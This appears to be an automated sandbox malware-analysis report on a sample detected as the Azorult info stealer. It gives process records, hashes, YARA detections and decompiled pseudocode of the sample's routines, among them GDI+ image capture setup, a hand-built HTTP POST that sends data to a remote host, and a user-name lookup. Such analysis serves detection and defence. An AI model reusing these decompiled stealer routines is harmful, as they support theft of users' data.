CN=Starfield Services Root Certificate Authority - G2, O="Starfield Technologies, Inc.", L=Scottsdale, ST=Arizona, C=US | OU=Starfield Class 2 Certification Authority, O="Starfield Technologies, Inc.", C=US | Wed Sep 02 02:00:00 CEST 2009 | Wed Jun 28 19:39:16 CEST 2034

                                                                                                                                                                                        Code Manipulations

                                                                                                                                                                                        Statistics

                                                                                                                                                                                        CPU Usage

                                                                                                                                                                                        Memory Usage

                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                        High Level Behavior Distribution

                                                                                                                                                                                        Click to dive into process behavior distribution

                                                                                                                                                                                        Behavior

                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                        System Behavior

                                                                                                                                                                                        General

                                                                                                                                                                                        Start time:20:40:58
                                                                                                                                                                                        Start date:02/03/2021
                                                                                                                                                                                        Path:C:\Users\user\Desktop\hfLfKDTosA.exe
                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                        Commandline:'C:\Users\user\Desktop\hfLfKDTosA.exe'
                                                                                                                                                                                        Imagebase:0xaa0000
                                                                                                                                                                                        File size:17616 bytes
                                                                                                                                                                                        MD5 hash:CF351C60783008409A564B31A5C38DD6
                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                        Programmed in:.Net C# or VB.NET
                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                        • Rule: JoeSecurity_Azorult, Description: Yara detected Azorult Info Stealer, Source: 00000002.00000002.375321836.000000000415E000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                        • Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 00000002.00000002.375321836.000000000415E000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                        • Rule: Azorult, Description: detect Azorult in memory, Source: 00000002.00000002.375321836.000000000415E000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                        Reputation:low

                                                                                                                                                                                        General

                                                                                                                                                                                        Start time:20:41:15
                                                                                                                                                                                        Start date:02/03/2021
                                                                                                                                                                                        Path:C:\Users\user\Desktop\hfLfKDTosA.exe
                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                        Commandline:C:\Users\user\Desktop\hfLfKDTosA.exe
                                                                                                                                                                                        Imagebase:0x3d0000
                                                                                                                                                                                        File size:17616 bytes
                                                                                                                                                                                        MD5 hash:CF351C60783008409A564B31A5C38DD6
                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Reputation:low

                                                                                                                                                                                        General

                                                                                                                                                                                        Start time:20:41:15
                                                                                                                                                                                        Start date:02/03/2021
                                                                                                                                                                                        Path:C:\Users\user\Desktop\hfLfKDTosA.exe
                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                        Commandline:C:\Users\user\Desktop\hfLfKDTosA.exe
                                                                                                                                                                                        Imagebase:0x7e0000
                                                                                                                                                                                        File size:17616 bytes
                                                                                                                                                                                        MD5 hash:CF351C60783008409A564B31A5C38DD6
                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                        • Rule: JoeSecurity_Azorult, Description: Yara detected Azorult Info Stealer, Source: 00000006.00000002.371678133.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                        • Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 00000006.00000002.371678133.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                        • Rule: Azorult_1, Description: Azorult Payload, Source: 00000006.00000002.371678133.0000000000400000.00000040.00000001.sdmp, Author: kevoreilly
                                                                                                                                                                                        • Rule: Azorult, Description: detect Azorult in memory, Source: 00000006.00000002.371678133.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                        Reputation:low

                                                                                                                                                                                        Disassembly

                                                                                                                                                                                        Code Analysis

                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 01418BAE
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.373463843.0000000001410000.00000040.00000001.sdmp, Offset: 01410000, based on PE: false
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: HandleModule
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 4139908857-0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0141F28A
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.373463843.0000000001410000.00000040.00000001.sdmp, Offset: 01410000, based on PE: false
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CreateWindow
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 716092398-0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • SetWindowLongW.USER32(?,FFFFFFF4,?), ref: 0141F41D
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.373463843.0000000001410000.00000040.00000001.sdmp, Offset: 01410000, based on PE: false
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: LongWindow
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1378638983-0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0141B246,?,?,?,?,?), ref: 0141B307
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.373463843.0000000001410000.00000040.00000001.sdmp, Offset: 01410000, based on PE: false
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: DuplicateHandle
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3793708945-0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0141B246,?,?,?,?,?), ref: 0141B307
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.373463843.0000000001410000.00000040.00000001.sdmp, Offset: 01410000, based on PE: false
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: DuplicateHandle
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3793708945-0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,01418C29,00000800,00000000,00000000), ref: 01418E3A
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.373463843.0000000001410000.00000040.00000001.sdmp, Offset: 01410000, based on PE: false
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: LibraryLoad
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1029625771-0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,01418C29,00000800,00000000,00000000), ref: 01418E3A
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.373463843.0000000001410000.00000040.00000001.sdmp, Offset: 01410000, based on PE: false
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: LibraryLoad
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1029625771-0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • KiUserCallbackDispatcher.NTDLL(0000004B), ref: 014174CD
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.373463843.0000000001410000.00000040.00000001.sdmp, Offset: 01410000, based on PE: false
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CallbackDispatcherUser
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2492992576-0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • KiUserCallbackDispatcher.NTDLL(0000004B), ref: 014174CD
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.373463843.0000000001410000.00000040.00000001.sdmp, Offset: 01410000, based on PE: false
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CallbackDispatcherUser
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2492992576-0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 01418BAE
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.373463843.0000000001410000.00000040.00000001.sdmp, Offset: 01410000, based on PE: false
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: HandleModule
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 4139908857-0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • SetWindowLongW.USER32(?,FFFFFFF4,?), ref: 0141F41D
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.373463843.0000000001410000.00000040.00000001.sdmp, Offset: 01410000, based on PE: false
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: LongWindow
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1378638983-0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • SetWindowLongW.USER32(?,FFFFFFF4,?), ref: 0141F41D
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.373463843.0000000001410000.00000040.00000001.sdmp, Offset: 01410000, based on PE: false
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: LongWindow
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1378638983-0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Non-executed Functions

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.373463843.0000000001410000.00000040.00000001.sdmp, Offset: 01410000, based on PE: false
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E00417B1A() {
                                                                                                                                                                                          				void* _t1;
                                                                                                                                                                                          				struct HINSTANCE__* _t2;
                                                                                                                                                                                          				struct HINSTANCE__* _t4;
                                                                                                                                                                                          				_Unknown_base(*)()* _t21;
                                                                                                                                                                                          
                                                                                                                                                                                          				 *0x41c890 =  *0x41c890 - 1;
                                                                                                                                                                                          				if( *0x41c890 < 0) {
                                                                                                                                                                                          					_t2 = LoadLibraryA("crtdll.dll"); // executed
                                                                                                                                                                                          					 *0x41c868 = GetProcAddress(_t2, "wcscmp");
                                                                                                                                                                                          					_t4 = LoadLibraryA("Gdiplus.dll"); // executed
                                                                                                                                                                                          					 *0x41c86c = GetProcAddress(_t4, "GdiplusStartup");
                                                                                                                                                                                          					 *0x41c870 = GetProcAddress(LoadLibraryA("Gdiplus.dll"), "GdiplusShutdown");
                                                                                                                                                                                          					 *0x41c874 = GetProcAddress(LoadLibraryA("Gdiplus.dll"), "GdipCreateBitmapFromHBITMAP");
                                                                                                                                                                                          					 *0x41c878 = GetProcAddress(LoadLibraryA("Gdiplus.dll"), "GdipGetImageEncodersSize");
                                                                                                                                                                                          					 *0x41c87c = GetProcAddress(LoadLibraryA("Gdiplus.dll"), "GdipGetImageEncoders");
                                                                                                                                                                                          					 *0x41c880 = GetProcAddress(LoadLibraryA("Gdiplus.dll"), "GdipDisposeImage");
                                                                                                                                                                                          					 *0x41c884 = GetProcAddress(LoadLibraryA("Gdiplus.dll"), "GdipSaveImageToStream");
                                                                                                                                                                                          					 *0x41c888 = GetProcAddress(LoadLibraryA("ole32.dll"), "CreateStreamOnHGlobal");
                                                                                                                                                                                          					_t21 = GetProcAddress(LoadLibraryA("ole32.dll"), "GetHGlobalFromStream");
                                                                                                                                                                                          					 *0x41c88c = _t21;
                                                                                                                                                                                          					return _t21;
                                                                                                                                                                                          				}
                                                                                                                                                                                          				return _t1;
                                                                                                                                                                                          			}








                                                                                                                                                                                          APIs
                                                                                                                                                                                          • LoadLibraryA.KERNEL32(crtdll.dll,wcscmp), ref: 00417B33
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,crtdll.dll), ref: 00417B39
                                                                                                                                                                                          • LoadLibraryA.KERNEL32(Gdiplus.dll,GdiplusStartup,00000000,crtdll.dll,wcscmp), ref: 00417B4D
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Gdiplus.dll), ref: 00417B53
                                                                                                                                                                                          • LoadLibraryA.KERNEL32(Gdiplus.dll,GdiplusShutdown,00000000,Gdiplus.dll,GdiplusStartup,00000000,crtdll.dll,wcscmp), ref: 00417B67
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Gdiplus.dll), ref: 00417B6D
                                                                                                                                                                                          • LoadLibraryA.KERNEL32(Gdiplus.dll,GdipCreateBitmapFromHBITMAP,00000000,Gdiplus.dll,GdiplusShutdown,00000000,Gdiplus.dll,GdiplusStartup,00000000,crtdll.dll,wcscmp), ref: 00417B81
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Gdiplus.dll), ref: 00417B87
                                                                                                                                                                                          • LoadLibraryA.KERNEL32(Gdiplus.dll,GdipGetImageEncodersSize,00000000,Gdiplus.dll,GdipCreateBitmapFromHBITMAP,00000000,Gdiplus.dll,GdiplusShutdown,00000000,Gdiplus.dll,GdiplusStartup,00000000,crtdll.dll,wcscmp), ref: 00417B9B
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Gdiplus.dll), ref: 00417BA1
                                                                                                                                                                                          • LoadLibraryA.KERNEL32(Gdiplus.dll,GdipGetImageEncoders,00000000,Gdiplus.dll,GdipGetImageEncodersSize,00000000,Gdiplus.dll,GdipCreateBitmapFromHBITMAP,00000000,Gdiplus.dll,GdiplusShutdown,00000000,Gdiplus.dll,GdiplusStartup,00000000,crtdll.dll), ref: 00417BB5
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Gdiplus.dll), ref: 00417BBB
                                                                                                                                                                                          • LoadLibraryA.KERNEL32(Gdiplus.dll,GdipDisposeImage,00000000,Gdiplus.dll,GdipGetImageEncoders,00000000,Gdiplus.dll,GdipGetImageEncodersSize,00000000,Gdiplus.dll,GdipCreateBitmapFromHBITMAP,00000000,Gdiplus.dll,GdiplusShutdown,00000000,Gdiplus.dll), ref: 00417BCF
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Gdiplus.dll), ref: 00417BD5
                                                                                                                                                                                          • LoadLibraryA.KERNEL32(Gdiplus.dll,GdipSaveImageToStream,00000000,Gdiplus.dll,GdipDisposeImage,00000000,Gdiplus.dll,GdipGetImageEncoders,00000000,Gdiplus.dll,GdipGetImageEncodersSize,00000000,Gdiplus.dll,GdipCreateBitmapFromHBITMAP,00000000,Gdiplus.dll), ref: 00417BE9
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Gdiplus.dll), ref: 00417BEF
                                                                                                                                                                                          • LoadLibraryA.KERNEL32(ole32.dll,CreateStreamOnHGlobal,00000000,Gdiplus.dll,GdipSaveImageToStream,00000000,Gdiplus.dll,GdipDisposeImage,00000000,Gdiplus.dll,GdipGetImageEncoders,00000000,Gdiplus.dll,GdipGetImageEncodersSize,00000000,Gdiplus.dll), ref: 00417C03
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,ole32.dll), ref: 00417C09
                                                                                                                                                                                          • LoadLibraryA.KERNEL32(ole32.dll,GetHGlobalFromStream,00000000,ole32.dll,CreateStreamOnHGlobal,00000000,Gdiplus.dll,GdipSaveImageToStream,00000000,Gdiplus.dll,GdipDisposeImage,00000000,Gdiplus.dll,GdipGetImageEncoders,00000000,Gdiplus.dll), ref: 00417C1D
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,ole32.dll), ref: 00417C23
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000006.00000002.371678133.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AddressLibraryLoadProc
                                                                                                                                                                                          • String ID: CreateStreamOnHGlobal$GdipCreateBitmapFromHBITMAP$GdipDisposeImage$GdipGetImageEncoders$GdipGetImageEncodersSize$GdipSaveImageToStream$Gdiplus.dll$GdiplusShutdown$GdiplusStartup$GetHGlobalFromStream$crtdll.dll$ole32.dll$wcscmp
                                                                                                                                                                                          • API String ID: 2574300362-2815069134
                                                                                                                                                                                          • Opcode ID: e6ff4e77b6af1514c1edbe4635b7f249009bf5d1aab2232b2624014b7c9938ce
                                                                                                                                                                                          • Instruction ID: 8590a6e993e3993f4c60c6cfae4e59332f73d92cf5cac50a27a19d2551d8218b
                                                                                                                                                                                          • Opcode Fuzzy Hash: e6ff4e77b6af1514c1edbe4635b7f249009bf5d1aab2232b2624014b7c9938ce
                                                                                                                                                                                          • Instruction Fuzzy Hash: 3911D0F17C430069DA0177B2DD8BAE635B4BBC1B4A730447B7104722D2E97C888196DD
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          C-Code - Quality: 65%
                                                                                                                                                                                          			E00418124(intOrPtr __eax, void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __esi, intOrPtr _a4, intOrPtr _a8, char _a12, intOrPtr _a16) {
                                                                                                                                                                                          				intOrPtr _v8;
                                                                                                                                                                                          				intOrPtr _v12;
                                                                                                                                                                                          				intOrPtr _v16;
                                                                                                                                                                                          				char _v20;
                                                                                                                                                                                          				char _v24;
                                                                                                                                                                                          				char _v28;
                                                                                                                                                                                          				char _v32;
                                                                                                                                                                                          				char _v432;
                                                                                                                                                                                          				intOrPtr _v444;
                                                                                                                                                                                          				short _v446;
                                                                                                                                                                                          				char _v448;
                                                                                                                                                                                          				char _v1472;
                                                                                                                                                                                          				char _v1476;
                                                                                                                                                                                          				char _v1480;
                                                                                                                                                                                          				char _v1484;
                                                                                                                                                                                          				char _v1488;
                                                                                                                                                                                          				char _v1492;
                                                                                                                                                                                          				void* _t141;
                                                                                                                                                                                          				void* _t144;
                                                                                                                                                                                          				void* _t151;
                                                                                                                                                                                          				void* _t186;
                                                                                                                                                                                          				struct HINSTANCE__* _t193;
                                                                                                                                                                                          				struct HINSTANCE__* _t196;
                                                                                                                                                                                          				void* _t197;
                                                                                                                                                                                          				intOrPtr _t206;
                                                                                                                                                                                          				void* _t222;
                                                                                                                                                                                          				void* _t225;
                                                                                                                                                                                          				void* _t228;
                                                                                                                                                                                          
                                                                                                                                                                                          				_v1476 = 0;
                                                                                                                                                                                          				_v1480 = 0;
                                                                                                                                                                                          				_v1484 = 0;
                                                                                                                                                                                          				_v1488 = 0;
                                                                                                                                                                                          				_v1492 = 0;
                                                                                                                                                                                          				_v20 = 0;
                                                                                                                                                                                          				_v24 = 0;
                                                                                                                                                                                          				_v28 = 0;
                                                                                                                                                                                          				_v32 = 0;
                                                                                                                                                                                          				_v16 = __ecx;
                                                                                                                                                                                          				_v12 = __edx;
                                                                                                                                                                                          				_v8 = __eax;
                                                                                                                                                                                          				E00403980(_v8);
                                                                                                                                                                                          				E00403980(_v12);
                                                                                                                                                                                          				E00403980(_v16);
                                                                                                                                                                                          				E00403980(_a16);
                                                                                                                                                                                          				E00403980(_a12);
                                                                                                                                                                                          				_push(_t228);
                                                                                                                                                                                          				_push(0x418535);
                                                                                                                                                                                          				_push( *[fs:eax]);
                                                                                                                                                                                          				 *[fs:eax] = _t228 + 0xfffffa30;
                                                                                                                                                                                          				E0040357C( &_v28, "wsock32.dll");
                                                                                                                                                                                          				_t196 = GetModuleHandleA(E004039E8( &_v28));
                                                                                                                                                                                          				if(_t196 == 0) {
                                                                                                                                                                                          					_t193 = LoadLibraryA(E004039E8( &_v28)); // executed
                                                                                                                                                                                          					_t196 = _t193;
                                                                                                                                                                                          				}
                                                                                                                                                                                          				 *0x41c89c = GetProcAddress(_t196,  &((E004039E8( &_v28))[0xc]));
                                                                                                                                                                                          				 *0x41c8a0 = GetProcAddress(_t196,  &((E004039E8( &_v28))[0x17]));
                                                                                                                                                                                          				 *0x41c8a4 = GetProcAddress(_t196,  &((E004039E8( &_v28))[0x25]));
                                                                                                                                                                                          				 *0x41c8a8 = GetProcAddress(_t196,  &((E004039E8( &_v28))[0x2c]));
                                                                                                                                                                                          				 *0x41c8ac = GetProcAddress(_t196,  &((E004039E8( &_v28))[0x31]));
                                                                                                                                                                                          				 *0x41c8b0 = GetProcAddress(_t196,  &((E004039E8( &_v28))[0x36]));
                                                                                                                                                                                          				 *0x41c8b4 = GetProcAddress(_t196,  &((E004039E8( &_v28))[0x3c]));
                                                                                                                                                                                          				 *0x41c8b8 = GetProcAddress(_t196,  &((E004039E8( &_v28))[0x44]));
                                                                                                                                                                                          				if(_t196 != 0 &&  *0x41c89c != 0 &&  *0x41c8a0 != 0 &&  *0x41c8a4 != 0 &&  *0x41c8a8 != 0 &&  *0x41c8ac != 0 &&  *0x41c8b0 != 0 &&  *0x41c8b4 != 0 &&  *0x41c8b8 != 0) {
                                                                                                                                                                                          					E004034E4( &_v24);
                                                                                                                                                                                          					_push( &_v432);
                                                                                                                                                                                          					_push(E00404EE4(2, 2));
                                                                                                                                                                                          					if( *0x41c89c() == 0) {
                                                                                                                                                                                          						_t141 =  *0x41c8a4(2, 1, 0); // executed
                                                                                                                                                                                          						_t225 = _t141;
                                                                                                                                                                                          						if(_t225 != 0xffffffff) {
                                                                                                                                                                                          							_v448 = 2;
                                                                                                                                                                                          							_t144 =  *0x41c8a0(E00403990(_v8)); // executed
                                                                                                                                                                                          							if(_t144 != 0) {
                                                                                                                                                                                          								_v444 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t144 + 0xc))))));
                                                                                                                                                                                          								_v446 =  *0x41c8b0(_a8);
                                                                                                                                                                                          								_t151 =  *0x41c8b4(_t225,  &_v448, 0x10);
                                                                                                                                                                                          								_t243 = _t151;
                                                                                                                                                                                          								if(_t151 == 0) {
                                                                                                                                                                                          									E00403850();
                                                                                                                                                                                          									E00403D2C( &_v1480, _v1484);
                                                                                                                                                                                          									E00417D60(E00403790(_a12), _t196,  &_v1488, _t225, _t243);
                                                                                                                                                                                          									E00403D2C( &_v1492, _a12);
                                                                                                                                                                                          									E00403E1C();
                                                                                                                                                                                          									E0040377C( &_v20, _v1476);
                                                                                                                                                                                          									 *0x41c8a8(_t225, E004039E8( &_v20), E00403790(_v20), 0, _v1492, L"\r\n\r\n", _v1488, _v1480, "Content-Length: ", 0x4185d8, "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)", "User-agent: ", "Connection: close\r\n", 0x4185d8, _a16, "Host: ", " HTTP/1.0\r\n", _v12, 0x4185a8, _v16);
                                                                                                                                                                                          									E004034E4( &_v24);
                                                                                                                                                                                          									do {
                                                                                                                                                                                          										E004034E4( &_v32);
                                                                                                                                                                                          										E004028E0( &_v1472, 0x400);
                                                                                                                                                                                          										_t197 =  *0x41c8ac(_t225,  &_v1472, 0x400, 0);
                                                                                                                                                                                          										E004035D4( &_v32, _t197,  &_v1472);
                                                                                                                                                                                          										E00403798( &_v24, _v32);
                                                                                                                                                                                          									} while (_t197 > 0);
                                                                                                                                                                                          									 *0x41c8b8(_t225);
                                                                                                                                                                                          									_push( &_v24);
                                                                                                                                                                                          									_push(E00403A78(0x418680, _v24) + 4);
                                                                                                                                                                                          									_t186 = E00403790(_v24);
                                                                                                                                                                                          									_pop(_t222);
                                                                                                                                                                                          									E004039F0(_v24, _t186, _t222);
                                                                                                                                                                                          									E00403538(_a4, _v24);
                                                                                                                                                                                          								}
                                                                                                                                                                                          							}
                                                                                                                                                                                          						}
                                                                                                                                                                                          					}
                                                                                                                                                                                          				}
                                                                                                                                                                                          				_pop(_t206);
                                                                                                                                                                                          				 *[fs:eax] = _t206;
                                                                                                                                                                                          				_push(E0041853C);
                                                                                                                                                                                          				E00403B98( &_v1492, 2);
                                                                                                                                                                                          				E004034E4( &_v1484);
                                                                                                                                                                                          				E00403B98( &_v1480, 2);
                                                                                                                                                                                          				E00403508( &_v32, 7);
                                                                                                                                                                                          				return E00403508( &_a12, 2);
                                                                                                                                                                                          			}
































                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000,00000000,00418535,?,00000000,00000000,?,00418B28,00000000,?,?,?,?,?,0041B0FC,0000044D), ref: 004181B0
                                                                                                                                                                                          • LoadLibraryA.KERNEL32(00000000,00000000,00000000,00418535,?,00000000,00000000,?,00418B28,00000000,?,?,?,?,?,0041B0FC), ref: 004181C4
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,-0000000C), ref: 004181D8
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,-00000017), ref: 004181EF
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,-00000025), ref: 00418206
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,-0000002C), ref: 0041821D
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,-00000031), ref: 00418234
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,-00000036), ref: 0041824B
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,-0000003C), ref: 00418262
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,-00000044), ref: 00418279
                                                                                                                                                                                          • WSAStartup.WS2_32(00000000,?), ref: 0041830C
                                                                                                                                                                                          • socket.WS2_32(00000002,00000001,00000000), ref: 00418320
                                                                                                                                                                                          • gethostbyname.WS2_32(00000000), ref: 00418343
                                                                                                                                                                                          • htons.WS2_32(00000000), ref: 00418363
                                                                                                                                                                                          • connect.WS2_32(00000000,00000002,00000010), ref: 0041837A
                                                                                                                                                                                          • send.WS2_32(00000000,00000000,00000000,00000000), ref: 0041844A
                                                                                                                                                                                          • closesocket.WS2_32(00000000), ref: 004184A9
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000006.00000002.371678133.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AddressProc$HandleLibraryLoadModuleStartupclosesocketconnectgethostbynamehtonssendsocket
                                                                                                                                                                                          • String ID: $$ HTTP/1.0$Connection: close$Content-Length: $Host: $Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)$User-agent: $wsock32.dll
                                                                                                                                                                                          • API String ID: 4159890453-3355491746
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E004065CC(void* __eax) {
                                                                                                                                                                                          				short _v516;
                                                                                                                                                                                          				int _t7;
                                                                                                                                                                                          				void* _t12;
                                                                                                                                                                                          				DWORD* _t15;
                                                                                                                                                                                          
                                                                                                                                                                                          				_t15 =  &_v516;
                                                                                                                                                                                          				_t12 = __eax;
                                                                                                                                                                                          				 *_t15 = 0xff;
                                                                                                                                                                                          				_t7 = GetUserNameW( &_v516, _t15); // executed
                                                                                                                                                                                          				if(_t7 == 0) {
                                                                                                                                                                                          					return E00403B80(_t12);
                                                                                                                                                                                          				}
                                                                                                                                                                                          				return E00403D10(_t12, 0x100,  &_v516);
                                                                                                                                                                                          			}








                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetUserNameW.ADVAPI32(?,?,?,00406CB6,00000000,00406D93,?,?,00000006,00000000,00000000,?,00419172,?), ref: 004065E9
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000006.00000002.371678133.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: NameUser
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2645101109-0
                                                                                                                                                                                          Uniqueness

